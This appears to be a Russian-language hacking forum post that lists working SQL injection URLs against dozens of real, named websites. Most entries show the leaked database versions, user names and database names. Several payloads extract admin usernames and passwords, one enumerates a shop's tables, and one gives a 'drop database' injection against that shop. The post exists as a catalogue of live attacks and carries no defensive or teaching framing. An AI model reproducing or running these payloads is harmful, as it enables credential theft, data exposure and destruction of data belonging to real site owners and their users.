SQL Инъекции

http://www.travellingtight.com/journal.php?id=3/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1

Database Version: 5.0.27-Debian_0.dotdeb.1
Database name: travellingtight_main
User name: travellingtight_us3r@localhost

 

http://www.sciencesmath-paris.math.jussieu.fr/index.php?page=-16'+union+select+1,2,concat_ws(0x3a,ID_USER,LOGIN_USER,PASS_USER,NOM_USER,PRENOM_USER,GENRE_USER,MAIL_USER,LVL_USER)+from+FOND_USER+limit+3,1+/*+&lien=14&lang=fr

http://www.sgieurope.com/index.php?RubID=24+union+select+1,2,concat_ws(0x3a3a,UserLogin,UserPassword),4,5,6,7,8,9,10+from+user+--+

http://www.fhp.fr/index.php?ID=&LangueID=1&ThemeID=-1+union+select+1,2,3,4,5,6,7,8+from+user+--+&RubID=1

http://surlinjobs.com/showjob.php?jobcode=-2604+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a3a,id,username,password),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+admin+limit+6,1+--+

 

Gis-t.org pr5
The American Association of State Highway and Transportation Officials sponsors the annual GIS for Transportation Symposium.

Code:

[COLOR=SlateGray]http://www.gis-t.org/poster.php?year=2008+and+substring(version(),1,1)=5+--+[/COLOR]

mysql version: 5.0.81-community
mysql user: gistorg_db@localhost

 

fitness.yantra.su -
http://fitness.yantra.su/next.php?id=1/**/anD/**/1=8%20/**/unION/**/seLEcT/**/1,version(),3/*
version - 4.1.22-log
user - [email protected]
database - yantra_main

 

http://www.theglasgowcollective.com/artists/detail/index.php?id=-1+UNION+SELECT+database(),version()
version - 5.0.45-log
user - [email protected]
database - theglasgow1

 

www.psychodelart.com
ТИЦ:20

PHP:

http://www.psychodelart.com/projects.php?ptype=-4+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/*

Version():4.0.27-max-log
Database():geokon10_db01
User():[email protected]

www.geokongroup.com
ТИЦ:20
PR:4

PHP:

http://www.geokongroup.com/shownews.php?news=-42+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7

Version():4.0.27-max-log
Database():geokon10
User():[email protected]

 

http://www.sacredpassage.com/schedule/index.php?id=-1+UNION+SELECT+1,user%28%29,3,4
version - 4.1.22-standard-log
user - sacredpa_sacred1@localhost
database - sacredpa_sacredpa

 

lol

Code:

http://www.sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version--

Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

 

http://livefrogsupyourarse.com/index.php?cat=php&item=1+UNION+SELECT+1,2,version(),4,5,6,7,8+LIMIT+1,1

Database Version: 5.0.81-community
Database name: livefrog_frosk
User name: livefrog_loon@localhost

http://www.obs.org/page.php?ITEM=26+UNION+SELECT+1,2,3,4,5,6,7,8,9+FROM+users+LIMIT+1,1

Database Version: 4.0.27-max-log
Database name: db136428592
User name: [email protected]


http://www.greenmagazine.com.au/news.php?aid=257+UNION+SELECT+1+FROM+LIMIT+1,1

Database Version: 4.1.22-standard-log
Database name: gre32382_greenmagazine
User name: gre32382@localhost

 

User: [email protected]
Database: db166299381
Version: 4.0.27-max-log

 

http://www.emediaworld.com/press_release/release_detail.php?id=-87007+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- пятрека

4.0.27-standard

5.0.51a-3-log

 

Code:

http://www.lymediseaseassociation.org/referral/Petitions/Petition.php?id=-1'+union+select+1,2,version()+--+

5 ветка

 

PR6

 

http://score.dnr.sc.gov/deep.php?subject=2&topic=1+union+select+1,concat(0x2a,version(),user(),database()),3,4,5+limit+1,1/*

4.1.20 score@localhostscore

 

Какойто онлаин магазин)))

http://www.avtax.ru/?info=3+union+select+1,concat_ws(user(),0x3a,version(),0x3a,database()),3,4,5/*&subinfo=9

А вот и прикол! вывод результата

# Кто мы?

# :[email protected]@localhost.localdomain:[email protected]_avtax2


Далее

http://www.avtax.ru/?info=3+union+select+1,table_name,3,4,5+from+information_schema.tables/*&subinfo=9

PHP:

# Кто мы?

# CHARACTER_SETS

# COLLATIONS

# COLLATION_CHARACTER_SET_APPLICABILITY

# COLUMNS

# COLUMN_PRIVILEGES

# KEY_COLUMN_USAGE

# ROUTINES

# SCHEMATA

# SCHEMA_PRIVILEGES

# STATISTICS

# TABLES

# TABLE_CONSTRAINTS

# TABLE_PRIVILEGES

# TRIGGERS

# USER_PRIVILEGES

# VIEWS

# tabCategories

# tabInfo

# tabMainInfo

# tabModels

# tabSex

# tabSubTovars

# tabTovars

# tabTovars_copy



Далее думаю ясно всем будет))))

Также можно выполнить

http://www.avtax.ru/?info=3+drop+database+db_avtax2/*&subinfo=9

Но я не стал этого делать...

 

http://www.soltis-toiles.com/cat.php?p=11+UNION+SELECT+1,version(),3,4,5,6,7,8,9+LIMIT+1,1

Database name: soltis-stores
User name: soltis-stores@localhost
Database name: soltis-stores

 

http://www.firestone-duncan.com/print.php?topic=Services&cid=-1+union+select+1,2,'xekme',4,5,6+from+mysql.user--+

 

MsSQL
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

 

Code:

http://www.techiwarehouse.com/cms/articles.php?cat=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16+--+

 

http://www.topi-top.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+from+admin--


http://www.modeli.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+from+admin--